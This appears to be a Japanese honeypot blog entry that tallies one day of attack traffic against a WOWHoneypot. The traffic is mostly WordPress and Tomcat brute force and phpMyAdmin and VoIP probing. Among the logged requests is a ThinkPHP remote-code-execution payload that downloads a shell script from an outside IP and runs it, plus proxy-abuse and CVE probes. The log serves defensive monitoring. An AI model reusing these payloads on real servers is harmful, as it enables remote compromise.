23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(16日目)

2019/04/01(月)

トータルは3216件でした。

件数 概要 リクエス
539 Tomcat管理ページへ対するブルートフォース攻撃 GET /manager/html
86 WordPressの調査 GET /blog/wp-login.php
86 WordPressの調査 GET /2/wp-login.php
85 WordPress の Pingback を狙ったブルートフォース攻撃 POST /blog/xmlrpc.php
85 WordPressブルートフォース攻撃 POST /blog/wp-login.php
85 WordPress の Pingback を狙ったブルートフォース攻撃 POST /2/xmlrpc.php
85 WordPressブルートフォース攻撃 POST /2/wp-login.php
84 WordPress の Pingback を狙ったブルートフォース攻撃 POST /shop/xmlrpc.php
84 WordPressブルートフォース攻撃 POST /shop/wp-login.php
84 WordPress の Pingback を狙ったブルートフォース攻撃 POST /blog2/xmlrpc.php
84 WordPressブルートフォース攻撃 POST /blog2/wp-login.php
84 WordPressの調査 GET /shop/wp-login.php
84 WordPressの調査 GET /blog2/wp-login.php
84 WordPressの調査 GET /1/wp-login.php
83 WordPress の Pingback を狙ったブルートフォース攻撃 POST /vlog/xmlrpc.php
83 WordPressブルートフォース攻撃 POST /vlog/wp-login.php
83 WordPress の Pingback を狙ったブルートフォース攻撃 POST /forum/xmlrpc.php
83 WordPressブルートフォース攻撃 POST /forum/wp-login.php
83 WordPressの調査 GET /vlog/wp-login.php
83 WordPressの調査 GET /news/wp-login.php
83 WordPressの調査 GET /forum/wp-login.php
82 WordPress の Pingback を狙ったブルートフォース攻撃 POST /news/xmlrpc.php
82 WordPressブルートフォース攻撃 POST /blog3/wp-login.php
82 WordPress の Pingback を狙ったブルートフォース攻撃 POST /1/xmlrpc.php
82 WordPressブルートフォース攻撃 POST /1/wp-login.php
81 WordPressブルートフォース攻撃 POST /news/wp-login.php
81 WordPress の Pingback を狙ったブルートフォース攻撃 POST /blog3/xmlrpc.php
81 WordPressの調査 GET /blog3/wp-login.php
80 WordPress の Pingback を狙ったブルートフォース攻撃 POST /3/xmlrpc.php
80 WordPressブルートフォース攻撃 POST /3/wp-login.php
79 WordPressの調査 GET /3/wp-login.php
57 アクセス GET /
3 調査 GET /d03154bd5d65b8e7544ecb73e21620
2 WordPressの調査 GET /wp/wp-login.php
2 ZmEuによる調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
2 phpMyAdminの調査 GET /sql
2 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
2 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 phpMyAdminの調査 GET /mysql
2 phpMyAdminの調査 GET /myadmin/scripts/setup.php
2 phpMyAdminの調査 GET /main.php
1 IIS脆弱性を狙った通信 PROPFIND /
1 Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信 POST /users?page=&size=5
1 ThinkPHPの脆弱性を突いた通信 POST /TP/public/index.php?s=captcha
1 三者中継攻撃 HEAD hxxp://112.124.42.80:63435/
1 三者中継攻撃 GET hxxp://www.ip.cn/
1 三者中継攻撃 GET hxxp://www.baidu.com/?rands=_12162156801622619101745820
1 三者中継攻撃 GET hxxp://www.123cha.com/
1 三者中継攻撃 GET hxxp://www.123cha.com
1 三者中継攻撃 GET hxxp://boxun.com/
1 三者中継攻撃 GET hxxp://api.ipify.org/
1 三者中継攻撃 GET hxxp://157.52.156.49:42788/vs.php?rands=_2804754824656271524556
1 三者中継攻撃 GET hxxp://104.148.42.211:42788/gvs.php?rands=_2275734802660283380632
1 SQLiteManagerの調査 GET /~sqlitemanager/main.php
1 Yealink(ヤーリンクの調査 GET /yealink
1 phpMyAdminの調査 GET /xampp/phpmyadmin
1 WordPressの調査 GET /wp//wp-json/wp/v2/users/
1 WordPressの調査 GET /wp//?author=1
1 WordPressの調査 GET /wp-admin/
1 WordPressの調査 GET /wordpress/wp-login.php
1 phpMyAdminの調査 GET /websql/scripts/setup.php
1 phpMyAdminの調査 GET /webdb/scripts/setup.php
1 WebDAVの調査 GET /webdav/
1 WebDAVの調査 GET /webdav
1 phpMyAdminの調査 GET /webadmin/scripts/setup.php
1 phpMyAdminの調査 GET /webadmin
1 phpMyAdminの調査 GET /typo3/phpmyadmin
1 Tomcatの調査 GET /status?full=true
1 調査 GET /status
1 ZmEuによる調査 GET /sqlweb/scripts/setup.php
1 SQLiteManagerの調査 GET /sqlitemanager120/main.php
1 SQLiteManagerの調査 GET /sqlitemanager/main.php
1 SQLiteの調査 GET /sqlite_manager/main.php
1 SQLiteの調査 GET /sqlite/main.php
1 Cisco SPAシリーズの調査 GET /spa.xml
1 WordPressの調査 GET /site/wp-login.php
1 WordPressの調査 GET /site//wp-json/wp/v2/users/
1 WordPressの調査 GET /site//?author=1
1 調査 GET /script
1 プロビジョニングファイルの調査 GET /provisioning
1 プロビジョニングファイルの調査 GET /provision
1 Polycomの調査 GET /polycom
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin
1 phpMyAdminの調査 GET /phpMyAdmin-4.2.1-english
1 phpMyAdminの調査 GET /phpMyAdmin-4.2.1-all-languages
1 phpMyAdminの調査 GET /phpMyAdmin
1 不明 GET /overrides
1 MySQLDumperの調査 GET /mysqldumper
1 phpMyAdminの調査 GET /mysqladmin/scripts/setup.php
1 SQLiteManagerの調査 GET /mysql_lite_manager/main.php
1 phpMyAdminの調査 GET /mysql/scripts/setup.php
1 phpMyAdminの調査 GET /mysql/admin/index.php?lang=en
1 phpMyAdminの調査 GET /mysql-admin/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin
1 MySQLDumperの調査 GET /mySqlDumper
1 MySQLDumperの調査 GET /msd1.24stable
1 MySQLDumperの調査 GET /msd1.24.4
1 MySQLDumperの調査 GET /msd1
1 MySQLDumperの調査 GET /msd
1 不明 GET /main.php/main.php
1 調査 GET /login
1 Joomla!の調査 GET /joomla/administrator
1 JMXコンソールの調査 GET /jmx-console
1 Jenkinsの調査 GET /jenkins/script
1 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://82.212.70.218/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;
1 Grandstreamの調査 GET /grandstream
1 アクセス GET /favicon.ico
1 Drupalの調査 GET /drupal/
1 WordPressの調査 GET /domain/wp-login.php
1 WordPressの調査 GET /domain//wp-json/wp/v2/users/
1 WordPressの調査 GET /domain//?author=1
1 phpMyAdminの調査 GET /dbadmin/scripts/setup.php
1 COLIBRIの調査 GET /colibri/conferences
1 CMSの調査 GET /cms/administrator
1 CMSの調査 GET /cms/
1 CISCOの調査 GET /cisco
1 CGIPHPの調査 GET /cgi-bin/php5
1 CGIPHPの調査 GET /cgi-bin/php
1 コンフィグファイルの調査 GET /cfg
1 phpMyAdminの調査 GET /admin/scripts/setup.php
1 WordPressの調査 GET /Wordpress/wp-login.php
1 ThinkPHPの脆弱性を突いた攻撃 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を突いた攻撃 GET /TP/public/index.php
1 SQLiteの調査 GET /SQlite/main.php
1 SQLiteManagerの調査 GET /SQLiteManager/main.php
1 SQLiteManagerの調査 GET /SQLiteManager-1.2.4/main.php
1 SQLiteManagerの調査 GET /SQLiteManager-1.2.0/main.php
1 SQLiteManagerの調査 GET /SQLite/SQLiteManager-1.2.4/main.php
1 SQLiteManagerの調査 GET /SQLM/main.php
1 phpMyAdminの調査 GET /PMA/scripts/setup.php
1 MySQLDumperの調査 GET /MySQLDumper1.24.4stable
1 MySQLDumperの調査 GET /MySQLDumper1.24.4
1 MySQLDumperの調査 GET /MySQLDumper
1 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 Joomla!の調査 GET /Joomla/administrator
1 MySQLDumperの調査 GET /Dumper
1 WordPressの調査 GET /Blog/wp-login.php
1 WordPressの調査 GET /3//wp-json/wp/v2/users/
1 WordPressの調査 GET /3//?author=1
1 WordPressの調査 GET /2//wp-json/wp/v2/users/
1 WordPressの調査 GET /2//?author=1
1 WordPressの調査 GET /1//wp-json/wp/v2/users/
1 WordPressの調査 GET /1//?author=1
1 Polycom製の製品のコンフィグファイルの調査 GET /000000000000.cfg
1 WordPressの調査 GET //wp-login.php
1 WordPressの調査 GET //administrator
1 三者中継攻撃 CONNECT www.baidu.com:443
1 三者中継攻撃 CONNECT www.baidu.com
1 三者中継攻撃 CONNECT cn.bing.com:443
1 三者中継攻撃 CONNECT 133.130.126.119:43

IP電話関連の調査と思われる通信を始め、MySQLDumper関連の通信など新たに観測したものが複数ありました。

他にも不明なものがいくつかありました。。。

GET /overrides HTTP/1.1
Host: ***.***.***.***
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0

GET /main.php/main.php HTTP/1.1
Accept-Encoding: identity
Host: ***.***.***.***:80
Connection: close
User-Agent: Python-urllib/2.7